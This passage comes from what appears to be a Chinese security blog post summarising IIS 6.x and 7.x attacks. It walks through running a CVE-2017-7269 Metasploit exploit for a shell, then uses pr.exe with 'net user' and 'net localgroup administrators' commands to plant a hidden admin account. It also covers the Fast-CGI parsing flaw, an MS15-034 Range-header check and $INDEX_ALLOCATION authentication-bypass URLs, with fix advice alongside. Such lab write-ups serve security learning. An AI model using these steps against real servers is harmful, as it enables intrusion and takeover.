          <a href="#漏洞修复" class="heading-link"><i class="fas fa-link"></i></a><a href="#漏洞修复" class="headerlink" title="漏洞修复"></a>漏洞修复</h3>
      <ul>
<li>关闭 WebDav服务</li>
<li>使用相关防护设备</li>
</ul>

        <h3 id="实战中的应用"   >
          <a href="#实战中的应用" class="heading-link"><i class="fas fa-link"></i></a><a href="#实战中的应用" class="headerlink" title="实战中的应用"></a>实战中的应用</h3>
      <p>条件：IIS 6.0 开启WebDav</p>
<p>接下来演示</p>
<p>exp：</p>
<figure class="highlight c"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">https:<span class="comment">//github.com/zcgonvh/cve-2017-7269</span></span><br></pre></td></tr></table></div></figure>

<p>下载后注意一点 进行更名一下</p>
<p><img src="https://img-blog.csdnimg.cn/20210420174824230.png" alt="在这里插入图片描述"><br>然后我们把这个<code>.rb</code>文件放入MSF的渗透框架中</p>
<p>/usr/share/metasploit-framework/modules/exploits/windows/iis/</p>
<p>然后执行cp命令即可</p>
<figure class="highlight c"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">cp /root/Desktop/cve_2017_7269.rb .</span><br></pre></td></tr></table></div></figure>

<p>启动MSF</p>
<p>使用这个模块</p>
<figure class="highlight c"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">use exploit/windows/iis/cve_2017_7269</span><br></pre></td></tr></table></div></figure>


<p><img src="https://img-blog.csdnimg.cn/20210420175817649.png" alt="在这里插入图片描述"></p>
<p>但是并没有拿到shell</p>
<p>进行排错一下</p>
<p><img src="https://img-blog.csdnimg.cn/2021042017575348.png" alt="在这里插入图片描述"></p>
<p>在IP地址中未分配，可以解释为非默认绑定</p>
<p><strong>注意：该exp只适用默认绑定和默认路径的情况才可以提权！</strong></p>
<p><img src="https://img-blog.csdnimg.cn/20210420175859782.png" alt="在这里插入图片描述"></p>
<p>这里 做不做都是可以的</p>
<p>就是批量检测进程溢出</p>
<p>这里有个工具</p>
<figure class="highlight c"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">https:<span class="comment">//github.com/admintony/Windows-Exploit/tree/master/IIS6_WebDAV_Scanner</span></span><br></pre></td></tr></table></div></figure>

<figure class="highlight c"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python IIS6_WebDAV_Scanner.py -p <span class="number">1.</span>txt</span><br></pre></td></tr></table></div></figure>

<p><img src="https://img-blog.csdnimg.cn/20210421081103207.png" alt="在这里插入图片描述"><br>得到溢出值是19</p>
<p>然后设置MSF中的PhysicalPathLength为19</p>
<p>MSF 重新跑一下</p>
<p>成功拿到了shell</p>
<p><img src="https://img-blog.csdnimg.cn/2021042019273069.png" alt="在这里插入图片描述"></p>
<p>简单看一下权限</p>
<p><img src="https://img-blog.csdnimg.cn/20210420193035852.png" alt="在这里插入图片描述"></p>
<p>是真的 好低哇</p>
<p>这里用到一个提权工具 </p>
<p>针对缓冲区溢出的一个工具 挺老的</p>
<p>进行上传</p>
<figure class="highlight c"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">upload <span class="string">&#x27;/root/Desktop/pr.exe&#x27;</span>  c:\Windows\system32\inetsrv</span><br></pre></td></tr></table></div></figure>
<p>然后进行创建用户</p>
<figure class="highlight c"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">pr.exe <span class="string">&quot;net user a002 963852 /add&quot;</span></span><br></pre></td></tr></table></div></figure>

<p>添加到管理员组</p>
<figure class="highlight c"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">pr.exe <span class="string">&quot;net localgroup administrators a002 /add</span></span><br></pre></td></tr></table></div></figure>


        <h1 id="IIS7-x渗透"   >
          <a href="#IIS7-x渗透" class="heading-link"><i class="fas fa-link"></i></a><a href="#IIS7-x渗透" class="headerlink" title="IIS7.x渗透"></a>IIS7.x渗透</h1>
      
        <h2 id="0x01-解析漏洞"   >
          <a href="#0x01-解析漏洞" class="heading-link"><i class="fas fa-link"></i></a><a href="#0x01-解析漏洞" class="headerlink" title="0x01 解析漏洞"></a>0x01 解析漏洞</h2>
      
        <h4 id="原理-2"   >
          <a href="#原理-2" class="heading-link"><i class="fas fa-link"></i></a><a href="#原理-2" class="headerlink" title="原理"></a>原理</h4>
      <p>IIS7.x版本在Fast-CGl运行模式下，在任意文件，例：a001.jpg/png后面加上/php，会将a001.jpg/png解析为php文件</p>
<p>修复建议：配置 cgi fix_pathinfo（php inil中）为0并重启php-cgi程序</p>
<p>我这边在Windows Server 2008 R2上进行搞</p>
<p><img src="https://img-blog.csdnimg.cn/20210420200103496.png" alt="在这里插入图片描述"><br><img src="https://img-blog.csdnimg.cn/20210420212942627.png" alt="在这里插入图片描述"><br><img src="https://img-blog.csdnimg.cn/20210420213012789.png" alt="在这里插入图片描述"><br><img src="https://img-blog.csdnimg.cn/20210420213052813.png" alt="在这里插入图片描述"></p>
<p>安装成功后 打开</p>
<p>IIS7是有一个默认网站的</p>
<p>本地访问一下 ok</p>
<p> 这就成功了</p>
<p><img src="https://img-blog.csdnimg.cn/20210420213347434.png" alt="在这里插入图片描述"></p>
<p>确定版本</p>
<p><img src="https://img-blog.csdnimg.cn/20210420220352284.png" alt="在这里插入图片描述"></p>
<p><img src="https://img-blog.csdnimg.cn/20210420220412341.png" alt="在这里插入图片描述"></p>
<p>确认是IIS7.5的版本</p>
<p>然后这边我用phpstudy进行联动</p>
<p>切换版本</p>
<p><img src="https://img-blog.csdnimg.cn/20210420215553168.png" alt="在这里插入图片描述"><br>报了个错 说找不到</p>
<p>把这个文件扩展名 打开</p>
<p><img src="https://img-blog.csdnimg.cn/20210420215800622.png" alt="在这里插入图片描述"><br><img src="https://img-blog.csdnimg.cn/20210420220147508.png" alt="在这里插入图片描述"></p>
<p>Google的解决方案是说 因为phpstudy安装在了C盘目录下</p>
<p>所以启动要拿管理员启动</p>
<p>切换成功</p>
<p><img src="https://img-blog.csdnimg.cn/20210420220309776.png" alt="在这里插入图片描述"></p>
<p>查看网站的基本信息</p>
<p><img src="https://img-blog.csdnimg.cn/20210420220615700.png" alt="在这里插入图片描述"></p>
<p>默认端口是8980</p>
<p>那就访问一下phpstudy网站目录下的东西吧</p>
<p>访问康康哇</p>
<p><img src="https://img-blog.csdnimg.cn/202104202208348.png" alt="在这里插入图片描述"></p>
<p>成功访问</p>
<p><img src="https://img-blog.csdnimg.cn/2021042022090097.png" alt="在这里插入图片描述"></p>
<p>如果你没有用phpstudy的话</p>
<p>那么就要手动添加</p>
<p><img src="https://img-blog.csdnimg.cn/20210420221109849.png" alt="在这里插入图片描述"></p>
<p>右键添加 选择php安装目录下的的<code>php-cgi.exe</code>的文件 就可以了 </p>
<p><img src="https://img-blog.csdnimg.cn/20210420221125115.png" alt="在这里插入图片描述"></p>
<p>强调一下</p>
<p>这个勾要打上</p>
<p><img src="https://img-blog.csdnimg.cn/20210420221249468.png" alt="在这里插入图片描述"></p>
<p>把Windows Server 2008 R2的防火墙关闭一下</p>
<p>然后远程访问一下 </p>
<p>中间端口打错了 </p>
<p><img src="https://img-blog.csdnimg.cn/20210420222250761.png" alt="在这里插入图片描述"></p>
<p>解析漏洞</p>
<p><img src="https://img-blog.csdnimg.cn/20210420223553997.png" alt="在这里插入图片描述"></p>
<p><img src="https://img-blog.csdnimg.cn/20210420223003226.png" alt="在这里插入图片描述"></p>
<p>我们访问一下</p>
<p><img src="https://img-blog.csdnimg.cn/20210420223026843.png" alt="在这里插入图片描述"></p>
<p>发现是不可以的</p>
<p>解析漏洞来了</p>
<p><img src="https://img-blog.csdnimg.cn/20210420223135450.png" alt="在这里插入图片描述"></p>
<p><img src="https://img-blog.csdnimg.cn/20210420223156123.png" alt="在这里插入图片描述"></p>
<p><img src="https://img-blog.csdnimg.cn/20210420223213733.png" alt="在这里插入图片描述"></p>
<p>把这个对勾去了就可以了</p>
<p><img src="https://img-blog.csdnimg.cn/2021042022323518.png" alt="在这里插入图片描述"><br><img src="https://img-blog.csdnimg.cn/20210420223726957.png" alt="在这里插入图片描述"></p>
<p>成功解析为<code>.php</code>文件</p>
<p>WebDAV在IIS7.5  在这里<img src="https://img-blog.csdnimg.cn/20210420223923728.png" alt="在这里插入图片描述"><img src="https://img-blog.csdnimg.cn/2021042022393652.png" alt="在这里插入图片描述"></p>

        <h4 id="修复建议-1"   >
          <a href="#修复建议-1" class="heading-link"><i class="fas fa-link"></i></a><a href="#修复建议-1" class="headerlink" title="修复建议"></a>修复建议</h4>
      <p>配置 <code>cgi.fix_pathinfo(php.ini中)</code>为0并重启php-cgi程序</p>

        <h2 id="0x02-HTTP-SYS远程代码执行-MS15-034"   >
          <a href="#0x02-HTTP-SYS远程代码执行-MS15-034" class="heading-link"><i class="fas fa-link"></i></a><a href="#0x02-HTTP-SYS远程代码执行-MS15-034" class="headerlink" title="0x02 HTTP.SYS远程代码执行(MS15-034)"></a>0x02 HTTP.SYS远程代码执行(MS15-034)</h2>
      <p>HTTP.SYS是Microsoft Windows处理HTTP请求的内核驱动程序，为了优化IIS服务器性能，从IIS6.0引入，IIS服务进程依赖HTTP.SYS</p>
<p>HTTP.SYS远程代码执行漏洞实质是HTTP.SYS的整数溢出漏洞，当攻击者向受影响的Windows系统发送特殊设计的HTTP 请求，HTTP.sys 未正确分析时就会导致此漏洞，成功利用此漏洞的攻击者可以在系统帐户的上下文中执行任意代码。</p>
<p>主要存在Windows+IIS的环境下，任何安装了微软IIS 6.0以上的Windows Server 2008 R2/Server 2012/Server 2012 R2以及Windows 7/8/8.1操作系统都受到这个漏洞的影响验证这个漏洞</p>

        <h3 id="影响范围"   >
          <a href="#影响范围" class="heading-link"><i class="fas fa-link"></i></a><a href="#影响范围" class="headerlink" title="影响范围"></a>影响范围</h3>
      <p>Windows7、Windows server 2008 R2、Windows8、Windows server2012、Windows8.1和<br>Windows server 2012 R2</p>

        <h3 id="漏洞影响版本"   >
          <a href="#漏洞影响版本" class="heading-link"><i class="fas fa-link"></i></a><a href="#漏洞影响版本" class="headerlink" title="漏洞影响版本"></a>漏洞影响版本</h3>
      <p>IIS7.5、IIS8.0、IIS8.5</p>

        <h3 id="漏洞复现"   >
          <a href="#漏洞复现" class="heading-link"><i class="fas fa-link"></i></a><a href="#漏洞复现" class="headerlink" title="漏洞复现"></a>漏洞复现</h3>
      <p><img src="https://img-blog.csdnimg.cn/20210420225200570.png" alt="在这里插入图片描述"></p>
<p>竟然304了</p>
<p>这里说一下304这个状态码</p>
<p>304状态码或许不应该认为是一种错误，而是对客户端有缓存情况下服务端的一种响应</p>
<p>直接Ctrl+F5强制刷新就可以了</p>
<p>ok  正常了 拿到了200的状态码</p>
<p><img src="https://img-blog.csdnimg.cn/20210420225313347.png" alt="在这里插入图片描述"><br>JS前端的修改进行验证</p>
<p><img src="https://img-blog.csdnimg.cn/20210420225344643.png" alt="在这里插入图片描述"><br>添加这段内容进行验证</p>
<figure class="highlight c"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Range: bytes=<span class="number">0</span><span class="number">-18446744073709551615</span></span><br></pre></td></tr></table></div></figure>

<p><img src="https://img-blog.csdnimg.cn/20210420225420587.png" alt="在这里插入图片描述"></p>
<p><img src="https://img-blog.csdnimg.cn/20210420225511491.png" alt="在这里插入图片描述"></p>
<p>返回码状态为416 Requested Range Not Satisfiable</p>
<p>则存在 HTTP.SYS远程代码执行漏洞</p>
<p>漏洞影响版本：IIS6.0，IIS7.5</p>

        <h3 id="修复建议-2"   >
          <a href="#修复建议-2" class="heading-link"><i class="fas fa-link"></i></a><a href="#修复建议-2" class="headerlink" title="修复建议"></a>修复建议</h3>
      <p>安装修复补丁(KB3042553)</p>

        <h2 id="0x03-认证绕过漏洞"   >
          <a href="#0x03-认证绕过漏洞" class="heading-link"><i class="fas fa-link"></i></a><a href="#0x03-认证绕过漏洞" class="headerlink" title="0x03 认证绕过漏洞"></a>0x03 认证绕过漏洞</h2>
      
        <h3 id="简介-2"   >
          <a href="#简介-2" class="heading-link"><i class="fas fa-link"></i></a><a href="#简介-2" class="headerlink" title="简介"></a>简介</h3>
      <p>Microsof IIS是 Microsoft windows系统默认自带的Web服务器软件，其中默认包含FTP服务。Microsof IIS中存在认证绕过漏洞和源码泄露漏洞，该漏洞源于对用户提供的输入未经正确的验证。攻击者可利用这些漏洞在服务器进程上下文中获取密码保护资源和查看源代码文件的未授权访问，且有助于进一步攻击。</p>

        <h3 id="漏洞影响版本-1"   >
          <a href="#漏洞影响版本-1" class="heading-link"><i class="fas fa-link"></i></a><a href="#漏洞影响版本-1" class="headerlink" title="漏洞影响版本"></a>漏洞影响版本</h3>
      <p>IIS6.0、IIS7.5</p>

        <h3 id="漏洞原因"   >
          <a href="#漏洞原因" class="heading-link"><i class="fas fa-link"></i></a><a href="#漏洞原因" class="headerlink" title="漏洞原因"></a>漏洞原因</h3>
      <p>Microsof IIS由于无法正确清理用户提供的输入，容易岀现身份验证绕过漏洞和源代码泄露漏洞。</p>
<p>主要包括以下三类绕过</p>
<p>（1）安装了PHP的Microsof IIS6.0身份验证绕过</p>
<p>IIS/6.0加载受保护（如：admin）目录中的PHP文件需要用户认证信息（用户名和密码访问），如果将“<code>∷$INDEX_ALLOCATION</code>”后缀附加到目录名称后面，存在绕过认证并可能访问管理文件等特殊情况，导致IIS服务器重要信息泄露:</p>
<figure class="highlight c"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">/admin::$INDEX_ALLOCATION/index.php</span><br></pre></td></tr></table></div></figure>

<p>（2）Microsof IIS7.5经典ASP身份验证绕过</p>
<p>配置了经典ASP和 .NET Framework 4.0的Microsof IIS7.5，通过将<code>:i30:I NDEX_ALLOCATION</code>后缀附加到需要认证的请求目录名称后面，可以绕过经典的ASP文件访问限制</p>
<figure class="highlight c"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">/admin:$i30:$INDEX_ALLOCATION/index.asp</span><br></pre></td></tr></table></div></figure>

<p>（3）Microsof IIS7.5 .NET源代码公开和身份验证绕过</p>
<p>在配置中安装了PHP的Microsof IIS7.5，存在认证绕过漏洞；</p>
<figure class="highlight c"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http:<span class="comment">//&lt;victimIIS75&gt;/admin:$i30:$INDEX_ALLOCATION/admin.php</span></span><br></pre></td></tr></table></div></figure>


        <h3 id="演示一下第三个"   >
          <a href="#演示一下第三个" class="heading-link"><i class="fas fa-link"></i></a><a href="#演示一下第三个" class="headerlink" title="演示一下第三个"></a>演示一下第三个</h3>
      <p>.NAT版本需要是4以上</p>
<p><img src="https://img-blog.csdnimg.cn/20210421062847634.png" alt="在这里插入图片描述"></p>
<p>网站目录在这里</p>
<p>搞个文件夹 丢个index.php</p>
<p><img src="https://img-blog.csdnimg.cn/20210421063401203.png" alt="在这里插入图片描述"></p>
<p><img src="https://img-blog.csdnimg.cn/20210421063455662.png" alt="在这里插入图片描述"></p>
<p>当我们把这个匿名身份验证禁用</p>
<p><img src="https://img-blog.csdnimg.cn/20210421063526720.png" alt="在这里插入图片描述"></p>
<p>访问一下</p>
<p>就变成401的未授权了</p>
<p><img src="https://img-blog.csdnimg.cn/20210421063602892.png" alt="在这里插入图片描述"></p>
<p>然后我们进行绕过</p>
<figure class="highlight c"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http:<span class="comment">//IP/a001:$i30:$INDEX_ALLOCATION/index.php</span></span><br></pre></td></tr></table></div></figure>


        <h2 id="0x04-解析漏洞-认证绕过漏洞"   >
          <a href="#0x04-解析漏洞-认证绕过漏洞" class="heading-link"><i class="fas fa-link"></i></a><a href="#0x04-解析漏洞-认证绕过漏洞" class="headerlink" title="0x04 解析漏洞+认证绕过漏洞"></a>0x04 解析漏洞+认证绕过漏洞</h2>
      <p>目标站点限制上传和访问php文件</p>
<p>可以利用上传aspx（.net支持解析的文件类型）文件逃避限制，将其当做php代码执行</p>
<p>网站目录下有一个 <code>index.aspx</code>的文件，里面写有php代码</p>
<p>在这里插入图片描述</p>
<p>认证漏洞绕过访问 index.aspx文件，页面返回乱码，未执行 phpinfo代码！</p>
<figure class="highlight c"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http:<span class="comment">//IP/a001:$i30:$INDEX_ALLOCATION/index.aspx</span></span><br></pre></td></tr></table></div></figure>

<p>这里我们在加上解析漏洞</p>
<figure class="highlight c"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http:<span class="comment">//IP/a001:$i30:$INDEX_ALLOCATION/index.aspx/.php</span></span><br></pre></td></tr></table></div></figure>

<p>在这里插入图片描述</p>
<p>成功执行</p>
</div><footer class="post-footer"><div class="post-ending ending"><div class="ending__text">------ 本文结束，感谢您的阅读 ------</div></div><div class="post-copyright copyright"><div class="copyright-author"><span class="copyright-author__name">本文作者: </span><span class="copyright-author__value"><a href="http://example.com">John Doe</a></span></div><div class="copyright-link"><span class="copyright-link__name">本文链接: </span><span class="copyright-link__value"><a href="http://example.com/2021/04/28/IIS/">http://example.com/2021/04/28/IIS/</a></span></div><div class="copyright-notice"><span class="copyright-notice__name">版权声明: </span><span class="copyright-notice__value">本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.en" rel="external nofollow" target="_blank">BY-NC-SA</a> 许可协议。转载请注明出处！</span></div></div><div class="post-tags"><span class="post-tags-item"><span class="post-tags-item__icon"><i class="fas fa-tag"></i></span><a class="post-tags-item__link" href="http://example.com/tags/IIS%E6%80%BB%E7%BB%93/">IIS总结</a></span></div><nav class="post-paginator paginator"><div class="paginator-prev"><a class="paginator-prev__link" href="/2021/06/22/Struts2/"><span class="paginator-prev__icon"><i class="fas fa-angle-left"></i></span><span class="paginator-prev__text">Struts2总结</span></a></div></nav></footer></div></div></div><div class="sidebar-wrap" id="sidebar-wrap"><aside class="sidebar" id="sidebar"><div class="sidebar-nav"><span class="sidebar-nav-toc current">文章目录</span><span class="sidebar-nav-ov">站点概览</span></div><section class="sidebar-toc"><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#%E5%AE%89%E8%A3%85IIS6"><span class="toc-number">1.</span> <span class="toc-text">
          安装IIS6</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E5%AE%89%E8%A3%85IIS7"><span class="toc-number">2.</span> <span class="toc-text">
          安装IIS7</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#IIS-6-X%E6%B8%97%E9%80%8F"><span class="toc-number">3.</span> <span class="toc-text">
          IIS 6.X渗透</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#0x01-IIS%E5%86%99%E6%9D%83%E9%99%90%E6%BC%8F%E6%B4%9E"><span class="toc-number">3.1.</span> <span class="toc-text">
          0x01 IIS写权限漏洞</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E5%AE%9E%E6%93%8D"><span class="toc-number">3.1.0.1.</span> <span class="toc-text">
          实操</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E9%98%B2%E5%BE%A1"><span class="toc-number">3.1.0.2.</span> <span class="toc-text">
          防御</span></a></li></ol></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x02-%E8%A7%A3%E6%9E%90%E6%BC%8F%E6%B4%9E"><span class="toc-number">3.2.</span> <span class="toc-text">
          0x02 解析漏洞</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#IIS%E6%96%87%E4%BB%B6%E8%A7%A3%E6%9E%90%E6%BC%8F%E6%B4%9E"><span class="toc-number">3.2.1.</span> <span class="toc-text">
          IIS文件解析漏洞</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E5%8E%9F%E7%90%86"><span class="toc-number">3.2.1.1.</span> <span class="toc-text">
          原理</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E5%AE%9E%E6%93%8D-1"><span class="toc-number">3.2.1.2.</span> <span class="toc-text">
          实操</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#IIS%E7%9B%AE%E5%BD%95%E8%A7%A3%E6%9E%90%E6%BC%8F%E6%B4%9E"><span class="toc-number">3.2.2.</span> <span class="toc-text">
          IIS目录解析漏洞</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E5%8E%9F%E7%90%86-1"><span class="toc-number">3.2.2.1.</span> <span class="toc-text">
          原理</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E9%98%B2%E5%BE%A1-1"><span class="toc-number">3.2.2.2.</span> <span class="toc-text">
          防御</span></a></li></ol></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x03-IIS%E7%9F%AD%E6%96%87%E4%BB%B6%E6%BC%8F%E6%B4%9E"><span class="toc-number">3.3.</span> <span class="toc-text">
          0x03 IIS短文件漏洞</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E7%AE%80%E4%BB%8B"><span class="toc-number">3.3.1.</span> <span class="toc-text">
          简介</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#IIS%E7%9F%AD%E6%96%87%E4%BB%B6%E5%90%8D%E4%BA%A7%E7%94%9F"><span class="toc-number">3.3.2.</span> <span class="toc-text">
          IIS短文件名产生</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%AE%9E%E6%93%8D-2"><span class="toc-number">3.3.3.</span> <span class="toc-text">
          实操</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E4%BF%AE%E5%A4%8D%E5%BB%BA%E8%AE%AE"><span class="toc-number">3.3.4.</span> <span class="toc-text">
          修复建议</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#1-%E4%BB%8ECMD%E5%91%BD%E4%BB%A4%E5%85%B3%E9%97%ADNTFS8-3%E6%96%87%E4%BB%B6%E6%A0%BC%E5%BC%8F%E7%9A%84%E6%94%AF%E6%8C%81"><span class="toc-number">3.3.4.1.</span> <span class="toc-text">
          1.从CMD命令关闭NTFS8.3文件格式的支持</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#2-%E4%BB%8E%E4%BF%AE%E6%94%B9%E6%B3%A8%E5%86%8C%E8%A1%A8%E5%85%B3%E9%97%ADNTFS-8-3%E6%96%87%E4%BB%B6%E6%A0%BC%E5%BC%8F%E7%9A%84%E6%94%AF%E6%8C%81"><span class="toc-number">3.3.4.2.</span> <span class="toc-text">
          2.从修改注册表关闭NTFS 8.3文件格式的支持</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E6%B3%A8%E6%84%8F"><span class="toc-number">3.3.4.3.</span> <span class="toc-text">
          注意</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%AE%9E%E6%88%98%E7%94%A8%E5%A4%84"><span class="toc-number">3.3.5.</span> <span class="toc-text">
          实战用处</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#IIS%E7%9F%AD%E6%96%87%E4%BB%B6%E6%BC%8F%E6%B4%9E%E5%B1%80%E9%99%90%E6%80%A7"><span class="toc-number">3.3.6.</span> <span class="toc-text">
          IIS短文件漏洞局限性</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x04-RCE-CVE-2017-7269"><span class="toc-number">3.4.</span> <span class="toc-text">
          0x04 RCE-CVE-2017-7269</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E7%AE%80%E4%BB%8B-1"><span class="toc-number">3.4.1.</span> <span class="toc-text">
          简介</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%BD%B1%E5%93%8D%E8%8C%83%E5%9B%B4%EF%BC%9A"><span class="toc-number">3.4.2.</span> <span class="toc-text">
          影响范围：</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%BC%8F%E6%B4%9E%E4%BF%AE%E5%A4%8D"><span class="toc-number">3.4.3.</span> <span class="toc-text">
          漏洞修复</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%AE%9E%E6%88%98%E4%B8%AD%E7%9A%84%E5%BA%94%E7%94%A8"><span class="toc-number">3.4.4.</span> <span class="toc-text">
          实战中的应用</span></a></li></ol></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#IIS7-x%E6%B8%97%E9%80%8F"><span class="toc-number">4.</span> <span class="toc-text">
          IIS7.x渗透</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#0x01-%E8%A7%A3%E6%9E%90%E6%BC%8F%E6%B4%9E"><span class="toc-number">4.1.</span> <span class="toc-text">
          0x01 解析漏洞</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E5%8E%9F%E7%90%86-2"><span class="toc-number">4.1.0.1.</span> <span class="toc-text">
          原理</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E4%BF%AE%E5%A4%8D%E5%BB%BA%E8%AE%AE-1"><span class="toc-number">4.1.0.2.</span> <span class="toc-text">
          修复建议</span></a></li></ol></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x02-HTTP-SYS%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C-MS15-034"><span class="toc-number">4.2.</span> <span class="toc-text">
          0x02 HTTP.SYS远程代码执行(MS15-034)</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%BD%B1%E5%93%8D%E8%8C%83%E5%9B%B4"><span class="toc-number">4.2.1.</span> <span class="toc-text">
          影响范围</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%BC%8F%E6%B4%9E%E5%BD%B1%E5%93%8D%E7%89%88%E6%9C%AC"><span class="toc-number">4.2.2.</span> <span class="toc-text">
          漏洞影响版本</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0"><span class="toc-number">4.2.3.</span> <span class="toc-text">
          漏洞复现</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E4%BF%AE%E5%A4%8D%E5%BB%BA%E8%AE%AE-2"><span class="toc-number">4.2.4.</span> <span class="toc-text">
          修复建议</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x03-%E8%AE%A4%E8%AF%81%E7%BB%95%E8%BF%87%E6%BC%8F%E6%B4%9E"><span class="toc-number">4.3.</span> <span class="toc-text">
          0x03 认证绕过漏洞</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E7%AE%80%E4%BB%8B-2"><span class="toc-number">4.3.1.</span> <span class="toc-text">
          简介</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%BC%8F%E6%B4%9E%E5%BD%B1%E5%93%8D%E7%89%88%E6%9C%AC-1"><span class="toc-number">4.3.2.</span> <span class="toc-text">
          漏洞影响版本</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%BC%8F%E6%B4%9E%E5%8E%9F%E5%9B%A0"><span class="toc-number">4.3.3.</span> <span class="toc-text">
          漏洞原因</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%BC%94%E7%A4%BA%E4%B8%80%E4%B8%8B%E7%AC%AC%E4%B8%89%E4%B8%AA"><span class="toc-number">4.3.4.</span> <span class="toc-text">
          演示一下第三个</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x04-%E8%A7%A3%E6%9E%90%E6%BC%8F%E6%B4%9E-%E8%AE%A4%E8%AF%81%E7%BB%95%E8%BF%87%E6%BC%8F%E6%B4%9E"><span class="toc-number">4.4.</span> <span class="toc-text">
          0x04 解析漏洞+认证绕过漏洞</span></a></li></ol></li></ol></section><!-- ov = overview--><section class="sidebar-ov hide"><div class="sidebar-ov-author"><div class="sidebar-ov-author__avatar"><img class="sidebar-ov-author__avatar_img" src="https://gitee.com/BothSavage/PicGo/raw/master/image/头像.png" alt="avatar"></div><p class="sidebar-ov-author__text">hello world</p></div><div class="sidebar-ov-state"><a class="sidebar-ov-state-item sidebar-ov-state-item--posts" href="/archives/"><div class="sidebar-ov-state-item__count">15</div><div class="sidebar-ov-state-item__name">归档</div></a><a class="sidebar-ov-state-item sidebar-ov-state-item--categories" href="/categories/"><div class="sidebar-ov-state-item__count">1</div><div class="sidebar-ov-state-item__name">分类</div></a><a class="sidebar-ov-state-item sidebar-ov-state-item--tags" href="/tags/"><div class="sidebar-ov-state-item__count">15</div><div class="sidebar-ov-state-item__name">标签</div></a></div><div class="sidebar-ov-cc"><a href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.en" target="_blank" rel="noopener" data-popover="知识共享许可协议" data-popover-pos="up"><img src="/images/cc-by-nc-sa.svg"></a></div></section><div class="sidebar-reading"><div class="sidebar-reading-info"><span class="sidebar-reading-info__text">你已阅读了 </span><span class="sidebar-reading-info__num">0</span><span class="sidebar-reading-info__perc">%</span></div><div class="sidebar-reading-line"></div></div></aside></div><div 